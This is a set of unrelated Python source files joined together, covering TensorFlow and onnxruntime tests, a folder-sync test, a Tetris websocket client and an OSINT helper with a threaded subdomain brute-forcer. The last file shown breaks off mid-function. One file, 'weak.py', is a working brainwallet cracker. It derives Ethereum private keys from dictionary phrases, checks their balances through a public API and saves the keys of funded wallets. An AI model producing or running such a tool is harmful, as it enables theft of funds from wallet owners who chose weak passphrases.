data_transfer_thread = threading.Thread(target=self.transfer_to_broker)
data_transfer_thread.start()
data_transfer_thread = threading.Thread(target=self.transfer_to_agent)
data_transfer_thread.start()
def transfer_to_agent(self):
""" send train data to learner """
while True:
data = self.recv_broker.get()
cmd = get_msg_info(data, "cmd")
if cmd == "close":
print("enter explore close")
self.close()
continue
data = get_msg_data(data)
self.send_agent.send(data)
def transfer_to_broker(self):
""" send train data to learner """
while True:
data = self.recv_agent.recv()
set_msg_info(data, broker_id=self.broker_id,
explorer_id=self.explorer_id)
self.send_broker.send(data)
def start(self):
""" start actor's thread and process """
self.start_data_transfer()
self.start_explore()
def close(self):
self.rl_agent.close()
def setup_explorer(broker_master, config_info, env_id):
config = deepcopy(config_info)
config["env_para"].update({"env_id": env_id})
msg = message(config, cmd="create_explorer")
broker_master.recv_local_q.send(msg)
|
fifo_queue_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.FIFOQueue."""
import time
from tensorflow.compiler.tests import xla_test
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
class FIFOQueueTest(xla_test.XLATestCase):
def testEnqueue(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32, shapes=(3, 2))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testMultipleDequeues(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q.enqueue([1]))
self.evaluate(q.enqueue([2]))
self.evaluate(q.enqueue([3]))
a, b, c = self.evaluate([q.dequeue(), q.dequeue(), q.dequeue()])
self.assertAllEqual(set([1, 2, 3]), set([a, b, c]))
def testQueuesDontShare(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q.enqueue(1))
q2 = data_flow_ops.FIFOQueue(10, [dtypes_lib.int32], shapes=[()])
self.evaluate(q2.enqueue(2))
self.assertAllEqual(self.evaluate(q2.dequeue()), 2)
self.assertAllEqual(self.evaluate(q.dequeue()), 1)
def testEnqueueDictWithoutNames(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
with self.assertRaisesRegex(ValueError, "must have names"):
q.enqueue({"a": 12.0})
def testParallelEnqueue(self):
with self.session() as sess, self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in range(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.session() as sess, self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in range(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.session() as sess, self.test_scope():
q = data_flow_ops.FIFOQueue(3, dtypes_lib.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in range(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.session() as sess, self.test_scope():
q = data_flow_ops.FIFOQueue(10, (dtypes_lib.int32, dtypes_lib.float32))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in range(len(elems)):
x_val, y_val = sess.run(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.session(), self.test_scope():
q = data_flow_ops.FIFOQueue(10, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, self.evaluate(size))
dequeued_t.op.run()
self.assertEqual(0, self.evaluate(size))
if __name__ == "__main__":
test.main()
|
test_folder_sync.py
|
from diode_ftp.header import hash_file
from diode_ftp.FolderSender import FolderSender
from diode_ftp.FolderReceiver import FolderReceiver
from pathlib import Path
from shutil import Error, copy2
from tests.common import *
import asyncio
import time
def create_send_rcv_folder(root: Path):
send = root / 'send'
rcv = root / 'rcv'
send.mkdir()
rcv.mkdir()
print(send, rcv)
return send, rcv
def do_sync_in_bkgd(send: Path, rcv: Path):
port = get_available_port()
sender = FolderSender(send, send_to=('127.0.0.1', port))
receiver = FolderReceiver(rcv)
def sender_thread():
sender.perform_sync()
def receiver_thread():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
t = loop.create_datagram_endpoint(lambda: receiver, local_addr=('0.0.0.0', port))
loop.run_until_complete(t)
loop.run_forever()
send_proc = threading.Thread(target=receiver_thread, daemon=True)
rcv_proc = threading.Thread(target=sender_thread, daemon=True)
send_proc.start()
rcv_proc.start()
def test_folder_sync(tmp_path: Path):
send, rcv = create_send_rcv_folder(tmp_path)
copy2(PAYLOAD, send / 'payload.txt')
copy2(BIG_FILE, send / 'big.bin')
do_sync_in_bkgd(send, rcv)
start = time.monotonic()
while time.monotonic() - start < 60:
# give it up to 60 seconds to sync
try:
assert hash_file(rcv / 'payload.txt') == PAYLOAD_HASH, "File hashes should be the same"
assert hash_file(rcv / 'big.bin') == BIG_HASH, "File hashes should be the same"
return
except Exception as e:
pass
# print('Could not check hashes because of: ', e)
assert False, "timeout for the folder sync to complete"
def test_diodeinclude(tmp_path: Path):
send, rcv = create_send_rcv_folder(tmp_path)
copy2(PAYLOAD, send / 'payload.txt')
copy2(PAYLOAD, send / 'payload.md')
# only send the markdown file
(send / '.diodeinclude').write_text('*.md')
do_sync_in_bkgd(send, rcv)
start = time.monotonic()
while time.monotonic() - start < 60:
# give it up to 60 seconds to sync
try:
assert hash_file(rcv / 'payload.md') == PAYLOAD_HASH, "File hashes should be the same"
assert not (rcv / 'payload.txt').exists(), "We should not send *.txt files"
return
except Exception as e:
pass
# print('Could not check hashes because of: ', e)
assert False, "timeout for the folder sync to complete"
|
online_handler.py
|
import websocket
import time
import threading
import json
from .game_instance import GameInstance
from .components.mino import Mino
from .launcher.online_lobby import OnlineLobby
from .launcher.gui_com import GuiCom
from .consts.urls import URLS
# receiving codes
RCODES = {
'game_data': 'gd',
'game_over': 'go',
'match_set': 'ms',
'match_complete': 'mc',
'game_start': 'gs',
'waiter_list': 'wl',
'host_accepted': 'ha',
'host_rejected': 'hr',
'approacher_list': 'al',
'lose': 'lo',
'win': 'wi'
}
# sending codes
SCODES = {
'game_data': 'gd',
'game_over': 'go',
'waiting_list_add': 'wa',
'waiting_list_remove': 'wr',
'waiting_list_get': 'wg',
'approach': 'a',
'approach_cancel': 'ac',
'host_accept': 'ha',
'host_reject': 'hr',
}
def on_error(ws, error):
print(error)
def on_close(ws, close_status_code, close_msg):
print("### closed ###")
class OnlineHandler:
def __init__(self, user_id: str,
game_instance: GameInstance,
opponent_instance: GameInstance,
online_lobby: OnlineLobby,
online_data: GuiCom,
jwt: str):
websocket.enableTrace(True)
self.status = 'hello'
self.user_id = user_id
self.jwt = jwt
self.game_instance = game_instance
self.opponent_instance = opponent_instance
self.opponent = None
self.online_lobby_gui = online_lobby
self.current_waiter_list = []
self.current_approacher_list = []
self.ws: websocket.WebSocketApp = websocket.WebSocketApp(
URLS.mp_server_url,
on_open=lambda ws: self.on_open(ws),
on_message=lambda ws, msg: self.on_message(ws, msg),
on_error=on_error,
on_close=lambda ws, close_status_code, close_msg: self.on_close(ws, close_status_code, close_msg),
)
self.online_data = online_data
self.ws_thread = threading.Thread(target=self.ws_connect, daemon=True) # 웹 소켓 연결 스레드
self.s_game_data_thread = threading.Thread(target=self.s_game_data_loop, daemon=True) # 게임 데이터 전송 스레드
self.gui_emit_thread = threading.Thread(target=self.on_emit, daemon=True) # online_lobby gui 입력 받아옴.
def on_emit(self):
while True:
data = self.online_data.handler_queue.get()
self.parse_emit(data)
def parse_emit(self, msg: dict):
todo = msg['t']
data = msg['d']
if todo == SCODES['host_accept']:
self.s_host_accept(data)
elif todo == SCODES['host_reject']:
self.s_host_reject(data)
elif todo == SCODES['approach']:
if self.status != 'approaching':
self.s_approach(data)
self.status = 'approaching'
elif todo == SCODES['approach_cancel']:
self.s_approach_cancel()
self.status = 'hello'
elif todo == SCODES['waiting_list_add']:
self.s_waiting_list_add()
self.status = 'waiting'
elif todo == SCODES['waiting_list_remove']:
self.s_waiting_list_remove()
self.status = 'hello'
elif todo == SCODES['waiting_list_get']:
self.s_waiting_list_get()
def on_open(self, ws: websocket.WebSocketApp): # 연결될때 실행됨.
self.jwt_auth()
def jwt_auth(self):
req = {
'id': self.user_id,
'jwt': self.jwt
}
self.send_json_req(req)
def on_message(self, ws, message):
try:
raw_data = json.loads(message) # 최상위 키가 둘 존재하는 딕셔너리 데이터
print(raw_data) # 디버그
except json.JSONDecodeError:
raw_data = None
print('message not in json format')
if raw_data is not None and raw_data != []:
self.r_parse_data(raw_data)
def on_close(self, ws, close_status_code, close_msg):
print("### closed ###")
print(f'{close_status_code}')
print(f'{close_msg}')
sig = self.build_dict(t='server_connection_lost')
self.online_lobby_gui.signal.emit(sig) # 서버 연결 끊어짐 알림
# 웹소켓 연결
def ws_connect(self):
self.ws.run_forever()
# 게임 인스턴스들 초기화
def reset_instances(self):
self.opponent_instance.reset()
self.game_instance.reset()
def game_start(self):
self.status = 'in_game'
self.reset_instances()
self.online_lobby_gui.signal.emit(self.build_dict('game_start'))
self.game_instance.status = 'mp_game_ready'
time.sleep(3)
self.s_game_data_thread_restart()
self.game_instance.ev_game_start()
# 이하 수신
# 데이터 parse
def r_parse_data(self, raw_data):
try:
t = raw_data['t']
d = raw_data['d']
except KeyError:
t = None
d = None
print(f'Cannot parse data:\n{raw_data=}')
print(self.status)
if t == RCODES['game_data']:
self.r_update_opponent_info(d)
elif t == RCODES['game_over']:
self.r_on_op_game_over()
elif t == RCODES['game_start']:
self.game_start()
elif t == RCODES['match_complete'] or t == RCODES['win'] or t == RCODES['lose']:
self.r_on_match_complete(t)
elif t == RCODES['host_rejected']:
self.r_host_rejected()
elif t == RCODES['approacher_list']:
self.r_update_current_approacher(d)
elif t == RCODES['waiter_list']:
self.r_update_current_waiter_list(d)
def r_update_opponent_info(self, d: dict):
if d:
score = d.get('score')
level = d.get('level')
goal = d.get('goal')
matrix = d.get('matrix')
next_mino_index = d.get('next_mino_index')
hold_mino_index = d.get('hold_mino_index')
self.opponent_instance.score = score
self.opponent_instance.level = level
self.opponent_instance.goal = goal
self.opponent_instance.board.temp_matrix = matrix
self.opponent_instance.next_mino = Mino(next_mino_index)
if hold_mino_index != -1:
self.opponent_instance.hold_mino = Mino(hold_mino_index)
def r_on_lose(self):
self.game_instance.status = 'mp_lose'
def r_on_win(self):
self.game_instance.status = 'mp_win'
def r_on_nothing(self):
self.game_instance.status = 'mp_hello'
def r_on_op_game_over(self):
self.opponent_instance.status = 'game_over'
def r_on_match_complete(self, t):
if t == RCODES['win']:
self.r_on_win()
elif t == RCODES['lose']:
self.r_on_lose()
elif t == RCODES['match_complete']:
self.r_on_nothing() # 승부 없이 끝났을 때
self.status = 'hello' # todo 상태 상수화
self.online_lobby_gui.signal.emit('init') # 게임 끝나면 gui 초기화
def r_update_current_approacher(self, d):
self.current_approacher_list = d
self.online_lobby_gui.approacher_list = d # approacher_list 데이터 수정
self.online_lobby_gui.approacher_update() # gui refresh
def r_update_current_waiter_list(self, d):
self.current_waiter_list = d
self.online_lobby_gui.waiter_list = d # waiter_list 데이터 수정
self.online_lobby_gui.waiter_update() # gui refresh
def r_host_rejected(self):
self.status = 'hello'
self.online_lobby_gui.signal.emit(self.build_dict('approach_rejected')) # todo signal 상수화
# 이하 전송
def send_json_req(self, req):
try:
self.ws.send(json.dumps(req))
except websocket.WebSocketConnectionClosedException:
sig = self.build_dict(t='server_connection_lost')
self.online_lobby_gui.signal.emit(sig)
@staticmethod
def build_dict(t: str, d=None):
to_return = {
't': t,
'd': d
}
return to_return
def build_and_send_json_req(self, t: str, d=None):
req = self.build_dict(t, d)
self.send_json_req(req=req)
def s_waiting_list_add(self):
self.build_and_send_json_req(SCODES['waiting_list_add'])
def s_waiting_list_remove(self):
self.build_and_send_json_req(SCODES['waiting_list_remove'])
def s_waiting_list_get(self):
self.build_and_send_json_req(SCODES['waiting_list_get'])
def s_approach(self, waiter_id: str):
self.build_and_send_json_req(SCODES['approach'], waiter_id)
def s_approach_cancel(self):
self.build_and_send_json_req(SCODES['approach_cancel'])
def s_host_accept(self, approacher_id: str):
self.build_and_send_json_req(SCODES['host_accept'], approacher_id)
# self.game_start()
def s_host_reject(self, approacher_id: str):
self.build_and_send_json_req(SCODES['host_reject'], approacher_id)
def s_game_data(self):
d = {
'id': self.user_id,
'score': self.game_instance.score,
'level': self.game_instance.level,
'goal': self.game_instance.goal,
'matrix': self.game_instance.board.temp_matrix,
'next_mino_index': self.game_instance.next_mino.shape_index,
'hold_mino_index': self.get_hold_mino_index(),
}
self.build_and_send_json_req(SCODES['game_data'], d)
def get_hold_mino_index(self) -> int:
if self.game_instance.hold_mino is not None:
return self.game_instance.hold_mino.shape_index
else:
return -1
def s_game_data_loop(self): # 스레드로 사용할것
while True:
if self.game_instance.status == 'in_game':
self.s_game_data() # 비동기 처리가 필요할수도
time.sleep(0.1) # 0.1초마다
if self.game_instance.status == 'game_over': # 게임 오버시 종료
self.build_and_send_json_req(t=SCODES['game_over'], d=None)
self.online_lobby_gui.signal.emit(self.build_dict('init'))
break
def s_game_data_thread_init(self): # 게임 데이터 전송 스레드 초기화
self.s_game_data_thread = threading.Thread(target=self.s_game_data_loop, daemon=True)
def s_game_data_thread_restart(self): # 게임 데이터 전송 스레드 재시작
self.s_game_data_thread_init()
self.s_game_data_thread.start()
|
weak.py
|
import threading
import os
import time
import codecs
import requests
import json
from ecdsa import SigningKey, SECP256k1
import sha3
import traceback
def getAddress(phrases):
keyList = []
addrList = []
addrStr = ""
try:
for phrase in phrases:
key = sha3.keccak_256(phrase.encode("utf-8")).hexdigest()
priv = codecs.decode(key, 'hex_codec')
pub = SigningKey.from_string(priv, curve=SECP256k1).get_verifying_key().to_string()
addr = "0x" + sha3.keccak_256(pub).hexdigest()[24:]
keyList.append(key)
addrList.append(addr)
if len(addrStr): addrStr = addrStr + ","
addrStr = addrStr + addr
except:
pass
return [keyList, addrList, addrStr]
def getBalances(addrStr):
balances = ""
try:
r = requests.get(url='https://etherchain.org/api/account/multiple/%s' % addrStr, timeout=5)
balances = r.text
except:
return
try:
balances = json.loads(balances)
if balances['status'] != 1: raise Exception("API Busy")
balances = balances['data']
except:
print (balances)
return balances
getCount = 0
fp_dict = open("dict.txt", "r")
fp_found = open("found.txt", "w+")
fp_fund = open("fund.txt", "w+")
def getWallet():
global getCount
while True:
phrases = []
try:
for i in range(50):
readStr = fp_dict.readline().replace("\r","").replace("\n","")
if not len(readStr): break
phrases.append(readStr)
except:
pass
if len(phrases) <= 0: break
addressRet = getAddress(phrases)
getCount = getCount + len(phrases)
try:
balancesRet = getBalances(addressRet[2])
for balance in balancesRet:
key = ""
for i in range(0, len(addressRet[1])):
if balance['address'] == addressRet[1][i]:
key = addressRet[0][i]
break
if key == "": continue
fp_found.write(str(balance['balance']) + " " + key + " " + balance['address'] + "\n")
if balance['balance'] > 0:
fp_fund.write(str(balance['balance']) + " " + key + " " + balance['address'] + "\n")
#print (balance['balance'], key, balance['address'])
fp_found.flush()
fp_fund.flush()
except:
traceback.print_exc()
continue
clearScreen()
print (getCount)
def clearScreen():
os.system('clear')
def main():
threads = []
for i in range(1):
threads.append(threading.Thread(target=getWallet,args=()))
for t in threads:
time.sleep(1.0)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
main()
|
func.py
|
import requests
import json
import whois
from colorama import Fore,init
init(autoreset=True)
def whois_search(domain):
result=whois.whois(domain)
print(Fore.BLUE+"Domain",":",Fore.GREEN+str(result.domain_name))
print(Fore.BLUE+"Registrar",":",Fore.GREEN+str(result.registrar))
print(Fore.BLUE+"Updates at",":",Fore.GREEN+str(result.upadated_date))
print(Fore.BLUE+"Created at",":",Fore.GREEN+str(result.created_date))
print(Fore.BLUE+"Expires at",":",Fore.GREEN+str(result.expiry_date))
from threading import Thread
from queue import Queue
q = Queue()
def scan_subdomains(domain):
global q
while True:
# get the subdomain from the queue
subdomain = q.get()
# scan the subdomain
url = f"http://{subdomain}.{domain}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print(Fore.CYAN+"[+] Discovered subdomain:", url)
# we're done with scanning that subdomain
q.task_done()
def scanner(domain, n_threads, subdomains):
global q
# fill the queue with all the subdomains
for subdomain in subdomains:
q.put(subdomain)
for _ in range(n_threads):
# start all threads
worker = Thread(target=scan_subdomains, args=(domain))
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
def scan(domain):
wordlist = "subdomains.txt"
num_threads = 10
scanner(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines())
q.join()
def geo(ip):
url="http://ip-api.com/json/{ip}".format(ip=ip)
resp=requests.get(url)
resp=resp.text
resp=json.loads(resp)
for keys,values in resp.items():
print(Fore.CYAN+keys,":",values)
def isvpn(ip):
f=open("config.json","r")
f=f.read()
key=json.loads(f)
key=key["vpnapi.io"]
url="https://vpnapi.io/api/{ip}?key={key}".format(key=key,ip=ip)
resp=requests.get(url)
resp=resp.text
resp=json.loads(resp)
try:
for keys,values in resp["security"].items():
print(Fore.CYAN+keys,":",values)
except KeyError:
print(Fore.RED+"Invalid IP...")
def ns(domain):
result=whois.whois(domain)
ns=result.name_servers
for i in ns:
print(Fore.CYAN+i)
|
onnxruntime_test_python.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# -*- coding: UTF-8 -*-
import unittest
import os
import numpy as np
import onnxruntime as onnxrt
import threading
import sys
from helper import get_name
class TestInferenceSession(unittest.TestCase):
def run_model(self, session_object, run_options):
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = session_object.get_inputs()[0].name
res = session_object.run([], {input_name: x}, run_options=run_options)
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testModelSerialization(self):
so = onnxrt.SessionOptions()
so.log_verbosity_level = 1
so.logid = "TestModelSerialization"
so.optimized_model_filepath = "./PythonApiTestOptimizedModel.onnx"
onnxrt.InferenceSession(get_name("mul_1.onnx"), sess_options=so)
self.assertTrue(os.path.isfile(so.optimized_model_filepath))
def testGetProviders(self):
self.assertTrue('CPUExecutionProvider' in onnxrt.get_available_providers())
# get_all_providers() returns the default EP order from highest to lowest.
# CPUExecutionProvider should always be last.
self.assertTrue('CPUExecutionProvider' == onnxrt.get_all_providers()[-1])
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CPUExecutionProvider' in sess.get_providers())
def testEnablingAndDisablingTelemetry(self):
onnxrt.disable_telemetry_events()
# no-op on non-Windows builds
# may be no-op on certain Windows builds based on build configuration
onnxrt.enable_telemetry_events()
def testSetProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# confirm that CUDA Provider is in list of registered providers.
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# reset the session and register only CPU Provider.
sess.set_providers(['CPUExecutionProvider'])
# confirm only CPU Provider is registered now.
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testSetProvidersWithOptions(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
import sys
import ctypes
CUDA_SUCCESS = 0
def runBaseTest1():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
option1 = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option1])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
option2 = {'device_id': -1}
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option2])
sess.set_providers(['CUDAExecutionProvider', 'CPUExecutionProvider'], [option1, {}])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
def runBaseTest2():
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
self.assertTrue('CUDAExecutionProvider' in sess.get_providers())
# test get/set of "cuda_mem_limit" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('cuda_mem_limit' in option)
ori_mem_limit = option['cuda_mem_limit']
new_mem_limit = int(ori_mem_limit) // 2
option['cuda_mem_limit'] = new_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], str(new_mem_limit))
option['cuda_mem_limit'] = ori_mem_limit
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['cuda_mem_limit'], ori_mem_limit)
# test get/set of "arena_extend_strategy" configuration.
options = sess.get_provider_options()
self.assertTrue('CUDAExecutionProvider' in options)
option = options['CUDAExecutionProvider']
self.assertTrue('arena_extend_strategy' in option)
for strategy in ['kNextPowerOfTwo', 'kSameAsRequested']:
option['arena_extend_strategy'] = strategy
sess.set_providers(['CUDAExecutionProvider'], [option])
options = sess.get_provider_options()
self.assertEqual(options['CUDAExecutionProvider']['arena_extend_strategy'], strategy)
#
# Note: Tests that throw an exception leave an empty session due to how set_providers currently works,
# so run them last. Each set_providers call will attempt to re-create a session, so it's
# fine for a test that fails to run immediately after another one that fails.
# Alternatively a valid call to set_providers could be used to recreate the underlying session
# after a failed call.
#
option['arena_extend_strategy'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = -1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 1024.1024
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
option['cuda_mem_limit'] = 'wrong_value'
with self.assertRaises(RuntimeError):
sess.set_providers(['CUDAExecutionProvider'], [option])
def getCudaDeviceCount():
import ctypes
num_device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
result = cuda.cuInit(0)
result = cuda.cuDeviceGetCount(ctypes.byref(num_device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuDeviceGetCount failed with error code %d: %s" % (result, error_str.value.decode()))
return -1
return num_device.value
def setDeviceIdTest(i):
import ctypes
import onnxruntime as onnxrt
device = ctypes.c_int()
result = ctypes.c_int()
error_str = ctypes.c_char_p()
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
option = {'device_id': i}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
result = cuda.cuCtxGetDevice(ctypes.byref(device))
if result != CUDA_SUCCESS:
cuda.cuGetErrorString(result, ctypes.byref(error_str))
print("cuCtxGetDevice failed with error code %d: %s" % (result, error_str.value.decode()))
self.assertEqual(result, CUDA_SUCCESS)
self.assertEqual(i, device.value)
def runAdvancedTest():
num_device = getCudaDeviceCount()
if num_device < 0:
return
# Configure session to be ready to run on all available cuda devices
for i in range(num_device):
setDeviceIdTest(i)
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
# configure session with not legit option values and that shloud fail
with self.assertRaises(RuntimeError):
option = {'device_id': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'device_id': 'non_legit_value'}
sess.set_providers(['CUDAExecutionProvider'], [option])
# configure session with not legit option should cause no effect
option = {'device_id': 0}
sess.set_providers(['CUDAExecutionProvider'], [option])
option = {'non_legit_option': num_device}
sess.set_providers(['CUDAExecutionProvider'], [option])
self.assertEqual(['CUDAExecutionProvider', 'CPUExecutionProvider'], sess.get_providers())
libnames = ('libcuda.so', 'libcuda.dylib', 'cuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
runBaseTest1()
runBaseTest2()
runAdvancedTest()
except OSError:
continue
else:
break
else:
runBaseTest1()
runBaseTest2()
# raise OSError("could not load any of: " + ' '.join(libnames))
def testInvalidSetProviders(self):
with self.assertRaises(ValueError) as context:
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
sess.set_providers(['InvalidProvider'])
self.assertTrue(
'[\'InvalidProvider\'] does not contain a subset of available providers' in str(context.exception))
def testSessionProviders(self):
if 'CUDAExecutionProvider' in onnxrt.get_available_providers():
# create session from scratch, but constrain it to only use the CPU.
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"), providers=['CPUExecutionProvider'])
self.assertEqual(['CPUExecutionProvider'], sess.get_providers())
def testRunModel(self):
sess = onnxrt.InferenceSession(get_name("mul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModelFromBytes(self):
with open(get_name("mul_1.onnx"), "rb") as f:
content = f.read()
sess = onnxrt.InferenceSession(content)
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 2])
res = sess.run([output_name], {input_name: x})
output_expected = np.array([[1.0, 4.0], [9.0, 16.0], [25.0, 36.0]], dtype=np.float32)
np.testing.assert_allclose(output_expected, res[0], rtol=1e-05, atol=1e-08)
def testRunModel2(self):
sess = onnxrt.InferenceSession(get_name("matmul_1.onnx"))
x = np.array([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]], dtype=np.float32)
input_name = sess.get_inputs()[0].name
self.assertEqual(input_name, "X")
input_shape = sess.get_inputs()[0].shape
self.assertEqual(input_shape, [3, 2])
output_name = sess.get_outputs()[0].name
self.assertEqual(output_name, "Y")
output_shape = sess.get_outputs()[0].shape
self.assertEqual(output_shape, [3, 1])
res = sess.run([output_name], {input_name: x})
